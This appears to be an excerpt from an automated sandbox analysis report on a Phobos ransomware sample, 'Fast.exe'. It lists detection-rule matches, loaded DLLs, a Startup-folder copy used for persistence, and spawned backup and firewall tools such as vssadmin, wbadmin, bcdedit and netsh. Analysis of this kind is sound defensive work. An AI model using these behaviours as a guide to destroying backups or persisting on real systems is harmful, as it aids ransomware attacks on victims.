Source: 00000011.00000002.2024695997.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Identifies Phobos ransomware Author: unknown
Source: 00000002.00000000.1778560416.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Identifies Phobos ransomware Author: unknown
Source: C:\Users\user\Desktop\Fast.exeProcess Stats: CPU usage > 49%
Source: C:\Windows\System32\wbadmin.exeFile created: C:\Windows\Logs\WindowsBackupJump to behavior
Source: C:\Users\user\Desktop\Fast.exeCode function: 2_2_00CA82EE2_2_00CA82EE
Source: C:\Users\user\Desktop\Fast.exeCode function: 2_2_00CA848A2_2_00CA848A
Source: C:\Users\user\Desktop\Fast.exeCode function: 2_2_00CA669B2_2_00CA669B
Source: C:\Users\user\Desktop\Fast.exeCode function: 2_2_00CA646A2_2_00CA646A
Source: C:\Users\user\Desktop\Fast.exeCode function: 2_2_00CA6A042_2_00CA6A04
Source: C:\Users\user\Desktop\Fast.exeCode function: 2_2_00CA6F2A2_2_00CA6F2A
Source: C:\Users\user\AppData\Local\Fast.exeCode function: 14_2_000D6A0414_2_000D6A04
Source: C:\Users\user\AppData\Local\Fast.exeCode function: 14_2_000D6F2A14_2_000D6F2A
Source: C:\Users\user\AppData\Local\Fast.exeCode function: 14_2_000D646A14_2_000D646A
Source: C:\Users\user\AppData\Local\Fast.exeCode function: 14_2_000D848A14_2_000D848A
Source: C:\Users\user\AppData\Local\Fast.exeCode function: 14_2_000D669B14_2_000D669B
Source: C:\Users\user\AppData\Local\Fast.exeCode function: 14_2_000D82EE14_2_000D82EE
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fast.exeCode function: 25_2_00206F2A25_2_00206F2A
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fast.exeCode function: 25_2_00206A0425_2_00206A04
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fast.exeCode function: 25_2_0020646A25_2_0020646A
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fast.exeCode function: 25_2_0020848A25_2_0020848A
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fast.exeCode function: 25_2_0020669B25_2_0020669B
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fast.exeCode function: 25_2_002082EE25_2_002082EE
Source: C:\Windows\System32\wbengine.exeProcess token adjusted: SecurityJump to behavior
Source: C:\Users\user\Desktop\Fast.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\Fast.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\Desktop\Fast.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\Fast.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\Fast.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\Fast.exeSection loaded: drprov.dllJump to behavior
Source: C:\Users\user\Desktop\Fast.exeSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\Desktop\Fast.exeSection loaded: ntlanman.dllJump to behavior
Source: C:\Users\user\Desktop\Fast.exeSection loaded: davclnt.dllJump to behavior
Source: C:\Users\user\Desktop\Fast.exeSection loaded: davhlpr.dllJump to behavior
Source: C:\Users\user\Desktop\Fast.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Users\user\Desktop\Fast.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Users\user\Desktop\Fast.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\Fast.exeSection loaded: browcli.dllJump to behavior
Source: C:\Users\user\Desktop\Fast.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\Fast.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\Fast.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\Fast.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\Desktop\Fast.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\Fast.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\Fast.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\Fast.exeSection loaded: drprov.dllJump to behavior
Source: C:\Users\user\Desktop\Fast.exeSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\Desktop\Fast.exeSection loaded: ntlanman.dllJump to behavior
Source: C:\Users\user\Desktop\Fast.exeSection loaded: davclnt.dllJump to behavior
Source: C:\Users\user\Desktop\Fast.exeSection loaded: davhlpr.dllJump to behavior
Source: C:\Users\user\Desktop\Fast.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Users\user\Desktop\Fast.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Users\user\Desktop\Fast.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\Fast.exeSection loaded: browcli.dllJump to behavior
Source: C:\Users\user\Desktop\Fast.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\Fast.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\Fast.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: winbrand.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: winbrand.dll
Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dll
Source: C:\Windows\System32\vssadmin.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\vssadmin.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\vssadmin.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\vssadmin.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\vssadmin.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\vssadmin.exeSection loaded: vss_ps.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: onex.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: onex.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Fast.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Fast.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Fast.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Fast.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Fast.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Fast.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Fast.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\bcdedit.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Fast.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Fast.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Fast.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\bcdedit.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wbadmin.exeSection loaded: credui.dllJump to behavior
Source: C:\Windows\System32\wbadmin.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbadmin.exeSection loaded: blb_ps.dllJump to behavior
Source: C:\Windows\System32\wbengine.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\wbengine.exeSection loaded: virtdisk.dllJump to behavior
Source: C:\Windows\System32\wbengine.exeSection loaded: bcd.dllJump to behavior
Source: C:\Windows\System32\wbengine.exeSection loaded: spp.dllJump to behavior
Source: C:\Windows\System32\wbengine.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\wbengine.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\wbengine.exeSection loaded: clusapi.dllJump to behavior
Source: C:\Windows\System32\wbengine.exeSection loaded: wer.dllJump to behavior
Source: C:\Windows\System32\wbengine.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\wbengine.exeSection loaded: fltlib.dllJump to behavior
Source: C:\Windows\System32\wbengine.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\wbengine.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wbengine.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wbengine.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wbengine.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbengine.exeSection loaded: fveapi.dllJump to behavior
Source: C:\Windows\System32\wbengine.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\wbengine.exeSection loaded: blb_ps.dllJump to behavior
Source: C:\Windows\System32\wbengine.exeSection loaded: vds_ps.dllJump to behavior
Source: C:\Windows\System32\wbengine.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\wbengine.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\vdsldr.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\vdsldr.exeSection loaded: vdsutil.dllJump to behavior
Source: C:\Windows\System32\vdsldr.exeSection loaded: bcd.dllJump to behavior
Source: C:\Windows\System32\vdsldr.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\vdsldr.exeSection loaded: vds_ps.dllJump to behavior
Source: C:\Windows\System32\vds.exeSection loaded: atl.dll
Source: C:\Windows\System32\vds.exeSection loaded: osuninst.dll
Source: C:\Windows\System32\vds.exeSection loaded: vdsutil.dll
Source: C:\Windows\System32\vds.exeSection loaded: bcd.dll
Source: C:\Windows\System32\vds.exeSection loaded: uexfat.dll
Source: C:\Windows\System32\vds.exeSection loaded: ulib.dll
Source: C:\Windows\System32\vds.exeSection loaded: ifsutil.dll
Source: C:\Windows\System32\vds.exeSection loaded: devobj.dll
Source: C:\Windows\System32\vds.exeSection loaded: uudf.dll
Source: C:\Windows\System32\vds.exeSection loaded: untfs.dll
Source: C:\Windows\System32\vds.exeSection loaded: ufat.dll
Source: C:\Windows\System32\vds.exeSection loaded: fmifs.dll
Source: C:\Windows\System32\vds.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\vds.exeSection loaded: vds_ps.dll
Source: C:\Windows\System32\vds.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\vds.exeSection loaded: vdsdyn.dll
Source: C:\Windows\System32\vds.exeSection loaded: vdsbas.dll
Source: C:\Windows\System32\vds.exeSection loaded: vdsvd.dll
Source: C:\Windows\System32\vds.exeSection loaded: virtdisk.dll
Source: C:\Windows\System32\vds.exeSection loaded: fltlib.dll
Source: C:\Windows\System32\vds.exeSection loaded: hbaapi.dll
Source: C:\Windows\System32\vds.exeSection loaded: wmiclnt.dll
Source: C:\Windows\System32\vds.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\vds.exeSection loaded: amsi.dll
Source: C:\Windows\System32\vds.exeSection loaded: userenv.dll
Source: C:\Windows\System32\vds.exeSection loaded: profapi.dll
Source: C:\Windows\System32\vds.exeSection loaded: iscsidsc.dll
Source: C:\Windows\System32\vds.exeSection loaded: iscsium.dll
Source: C:\Windows\System32\vds.exeSection loaded: fveapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fast.exeSection loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fast.exeSection loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fast.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fast.exeSection loaded: winhttp.dll
Source: Fast.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Fast.exe, type: SAMPLEMatched rule: Windows_Ransomware_Phobos_11ea7be5 os = windows, severity = x86, description = Identifies Phobos ransomware, creation_date = 2020-06-25, scan_context = file, memory, reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.phobos, license = Elastic License v2, threat_name = Windows.Ransomware.Phobos, fingerprint = a264f93e085134e5114c5d72e1bf93e70935e33756a79f1021e9c1e71d6c8697, id = 11ea7be5-7aac-41d7-8d09-45131a9c656e, last_modified = 2021-08-23
Source: Fast.exe, type: SAMPLEMatched rule: MALWARE_Win_Phobos author = ditekshen, description = Detects Phobos ransomware
Source: 14.0.Fast.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Phobos_11ea7be5 os = windows, severity = x86, description = Identifies Phobos ransomware, creation_date = 2020-06-25, scan_context = file, memory, reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.phobos, license = Elastic License v2, threat_name = Windows.Ransomware.Phobos, fingerprint = a264f93e085134e5114c5d72e1bf93e70935e33756a79f1021e9c1e71d6c8697, id = 11ea7be5-7aac-41d7-8d09-45131a9c656e, last_modified = 2021-08-23
Source: 14.0.Fast.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Phobos author = ditekshen, description = Detects Phobos ransomware
Source: 14.2.Fast.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Phobos_11ea7be5 os = windows, severity = x86, description = Identifies Phobos ransomware, creation_date = 2020-06-25, scan_context = file, memory, reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.phobos, license = Elastic License v2, threat_name = Windows.Ransomware.Phobos, fingerprint = a264f93e085134e5114c5d72e1bf93e70935e33756a79f1021e9c1e71d6c8697, id = 11ea7be5-7aac-41d7-8d09-45131a9c656e, last_modified = 2021-08-23
Source: 14.2.Fast.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Phobos author = ditekshen, description = Detects Phobos ransomware
Source: 19.2.Fast.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Phobos_11ea7be5 os = windows, severity = x86, description = Identifies Phobos ransomware, creation_date = 2020-06-25, scan_context = file, memory, reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.phobos, license = Elastic License v2, threat_name = Windows.Ransomware.Phobos, fingerprint = a264f93e085134e5114c5d72e1bf93e70935e33756a79f1021e9c1e71d6c8697, id = 11ea7be5-7aac-41d7-8d09-45131a9c656e, last_modified = 2021-08-23
Source: 19.2.Fast.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Phobos author = ditekshen, description = Detects Phobos ransomware
Source: 25.2.Fast.exe.200000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Phobos_11ea7be5 os = windows, severity = x86, description = Identifies Phobos ransomware, creation_date = 2020-06-25, scan_context = file, memory, reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.phobos, license = Elastic License v2, threat_name = Windows.Ransomware.Phobos, fingerprint = a264f93e085134e5114c5d72e1bf93e70935e33756a79f1021e9c1e71d6c8697, id = 11ea7be5-7aac-41d7-8d09-45131a9c656e, last_modified = 2021-08-23
Source: 25.2.Fast.exe.200000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Phobos author = ditekshen, description = Detects Phobos ransomware
Source: 19.0.Fast.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Phobos_11ea7be5 os = windows, severity = x86, description = Identifies Phobos ransomware, creation_date = 2020-06-25, scan_context = file, memory, reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.phobos, license = Elastic License v2, threat_name = Windows.Ransomware.Phobos, fingerprint = a264f93e085134e5114c5d72e1bf93e70935e33756a79f1021e9c1e71d6c8697, id = 11ea7be5-7aac-41d7-8d09-45131a9c656e, last_modified = 2021-08-23
Source: 19.0.Fast.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Phobos author = ditekshen, description = Detects Phobos ransomware
Source: 17.2.Fast.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Phobos_11ea7be5 os = windows, severity = x86, description = Identifies Phobos ransomware, creation_date = 2020-06-25, scan_context = file, memory, reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.phobos, license = Elastic License v2, threat_name = Windows.Ransomware.Phobos, fingerprint = a264f93e085134e5114c5d72e1bf93e70935e33756a79f1021e9c1e71d6c8697, id = 11ea7be5-7aac-41d7-8d09-45131a9c656e, last_modified = 2021-08-23
Source: 17.2.Fast.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Phobos author = ditekshen, description = Detects Phobos ransomware
